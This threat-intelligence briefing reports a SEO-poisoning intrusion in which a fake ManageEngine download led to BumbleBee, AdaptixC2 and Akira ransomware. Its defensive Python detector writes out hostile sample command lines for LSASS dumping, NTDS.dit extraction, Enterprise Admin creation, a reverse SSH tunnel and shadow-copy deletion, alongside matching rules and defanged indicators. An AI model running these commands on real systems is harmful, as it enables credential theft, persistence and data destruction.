Hackers poison Bing search results to drop Akira ransomware on companies

Security teams have a fresh reason to distrust the top hit in a search engine. The DFIR Report has detailed an intrusion that started with a poisoned Bing search for a popular IT tool and ended, less than two days later, with Akira ransomware encrypting an entire Windows domain.

The case is a clean example of how cybercriminals now plant trusted-looking download pages at the top of search results and turn a single mistaken click into a full network compromise.

From a search result to a trojanized installer

A user searching Bing for "ManageEngine OpManager," a common network-monitoring suite, was steered to opmanager[.]pro, a high-fidelity lookalike of the real download page. That site funneled them to download-center[.]online, which served a booby-trapped MSI installer instead of the genuine software. An IT administrator later ran the file from an internal share. The installer dropped a malicious msimg32.dll next to a legitimate executable that imports it, so the program loaded the attacker's library instead of the system copy (DLL side-loading) and the BumbleBee loader executed.

The DFIR Report, working with Swisscom B2B CSIRT, ties the activity to a broader BumbleBee "SEO poisoning" campaign first flagged by researchers at Cyjax in May 2025. The operators ran a two-tier setup: convincing fake download sites such as opmanager[.]pro and zenmap[.]pro out front, and backend gateways that used a single URL parameter to dynamically serve trojanized installers for many different enterprise tools.

How the attack unfolded

About five hours after the first infection, the attacker dropped an AdaptixC2 beacon, hidden inside a renamed copy of a legitimate Windows utility, to hold a persistent command channel. From there they created new domain accounts with Enterprise Admin rights, installed RustDesk as a service for remote access, and pivoted over RDP to a domain controller and a backup server.

Credential theft was extensive. They extracted the NTDS.dit Active Directory database (the file that holds every domain user's password hash), dumped LSASS memory with the lsassy tool, and decrypted stored Veeam backup credentials via Windows DPAPI. The crew tunneled RDP over a reverse SSH connection to evade inbound firewall rules and used mixed-case commands like pOWerShELl.exE to slip past case-sensitive string matches. More than 75GB of files, credentials and domain configuration data were siphoned out through FileZilla to a server in Ukraine.

Roughly 44 hours after that first click, the attacker deployed Akira (staged as locker.exe), using WMI to wipe Volume Shadow Copies before encrypting the root domain, then returned two days later to encrypt a child domain as well. The same focus on Veeam credentials and backups has surfaced in earlier Akira cases documented by Sophos.

What you should do

Treat search-driven software downloads as a real initial-access vector: pull admin tools only from vendor domains you type yourself, and consider blocking newly registered lookalike domains. Watch for unexpected RustDesk or AdaptixC2 activity, brand-new Enterprise Admin accounts, ntdsutil or wbadmin touching NTDS.dit, shadow-copy deletion, and reverse SSH tunnels, and match on command lines case-insensitively so that mixed-case binaries like pOWerShELl.exE still hit. Keep at least one backup copy offline and immutable, because this playbook goes straight for Veeam and shadow copies.
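The watch list above, and the mixed-case evasion described earlier, reduce to a handful of command-line rules that any SOC can run over process-creation telemetry. The following is an added example written for this briefing, not code from The DFIR Report, IntelFusions or the intrusion itself: it runs case-insensitive rules over constructed process events (hypothetical hosts, users and command lines that mirror the tradecraft in the article) and adds a cheap heuristic that flags unusual casing in a well-known binary name, which is what pOWerShELl.exE looks like in a log.

```python
import re

# Constructed sample process-creation events (hypothetical, not from the report):
# (host, user, command line). They mirror the tradecraft described in the article.
SAMPLE_EVENTS = [
    ("WS01", r"CORP\itadmin",
     r"C:\Windows\System32\msiexec.exe /i \\fileshare\it\ManageEngine_OpManager.msi"),
    ("DC01", r"CORP\svc_backup2", r"pOWerShELl.exE -nop -w hidden -enc SQBFAFgA"),
    ("DC01", r"CORP\svc_backup2",
     r'ntdsutil.exe "ac i ntds" "ifm" "create full C:\Windows\Temp\ntds" q q'),
    ("DC01", r"CORP\svc_backup2",
     r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Windows\Temp\d.dmp full"),
    ("DC01", r"CORP\svc_backup2", r'net group "Enterprise Admins" helpdesk2 /add /domain'),
    ("SRV-BK01", r"CORP\svc_backup2",
     r'sc.exe create RustDesk binPath= "C:\Program Files\RustDesk\rustdesk.exe --service"'),
    ("SRV-BK01", r"CORP\svc_backup2", r"ssh.exe -N -R 3389:127.0.0.1:3389 ops@203.0.113.5"),
    ("DC01", r"CORP\svc_backup2", r"wmic shadowcopy delete"),
    ("WS02", r"CORP\jdoe", r"C:\Windows\System32\notepad.exe C:\Users\jdoe\notes.txt"),
]

# Each rule is (name, regex). re.IGNORECASE is the point: the operators ran
# "pOWerShELl.exE", and a case-sensitive match on "powershell.exe" never sees it.
RULES = [
    ("installer_from_share", r"msiexec(\.exe)?\b.*\s\\\\\S+\.msi\b"),
    ("encoded_powershell",   r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s"),
    ("ntds_extraction",      r"\bntdsutil\b|\bntds\.dit\b|\bwbadmin\b.*\bntds\b"),
    ("lsass_dump",           r"\blsassy\b|comsvcs\.dll.*MiniDump|procdump.*\blsass\b"),
    ("enterprise_admin_add", r"\bnet1?(\.exe)?\s+group\s+\"?enterprise admins\"?\s+\S+\s+/add\b"),
    ("rustdesk_service",     r"rustdesk.*--service|\bsc(\.exe)?\s+create\b.*rustdesk"),
    ("reverse_ssh_tunnel",   r"\bssh(\.exe)?\b.*\s-R\s+\d+:"),
    ("shadowcopy_wipe",      r"vssadmin.*delete\s+shadows|wmic.*shadowcopy.*delete|Win32_ShadowCopy"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]

# Binaries whose name is almost always typed in one of a few canonical casings.
LOLBINS = {"powershell.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe",
           "wscript.exe", "cscript.exe", "certutil.exe", "bitsadmin.exe"}


def basename(cmdline):
    """Image name as typed, without its path (first token, quoted or not)."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        head = s[1:].split('"', 1)[0]
    else:
        head = s.split(None, 1)[0] if s else ""
    return head.replace("/", "\\").rsplit("\\", 1)[-1]


def case_transitions(name):
    """Count lower<->upper flips between consecutive letters; 'PowerShell.exe' is 3."""
    letters = [c for c in name if c.isalpha()]
    return sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())


def odd_casing(cmdline):
    """True when a well-known binary is spelled with an implausible mix of cases."""
    name = basename(cmdline)
    return name.lower() in LOLBINS and case_transitions(name) >= 4


def detect(cmdline):
    """Return the sorted rule names that fire on one command line."""
    hits = [name for name, rx in COMPILED if rx.search(cmdline)]
    if odd_casing(cmdline):
        hits.append("obfuscated_casing")
    return sorted(hits)


def triage(events):
    """Group rule hits per host so the spread of the intrusion is visible at a glance."""
    hits = {}
    for host, _user, cmd in events:
        for rule in detect(cmd):
            hits.setdefault(host, set()).add(rule)
    return {host: sorted(rules) for host, rules in hits.items()}


if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(rules)}")
```

The rules need the full command line, which Windows only records when "Include command line in process creation events" is enabled for event 4688 or when Sysmon event ID 1 is collected; apply the casing heuristic to the command-line field, not the image path, because the OS reports the latter as it is spelled on disk. The casing check is a tell rather than a detection on its own, which is why it is reported alongside the rule that still fires through re.IGNORECASE.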

Indicators

Lookalike and delivery domains: opmanager[.]pro, zenmap[.]pro and download-center[.]online. Attacker infrastructure observed across the intrusions: 84[.]32[.]84[.]32, 4[.]239[.]95[.]1 and 170[.]130[.]55[.]223. Public sandbox analyses are available at hxxps://tria[.]ge/250530-ttmjhayzhw and hxxps://tria[.]ge/250812-zw4tfszpy4.

This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.
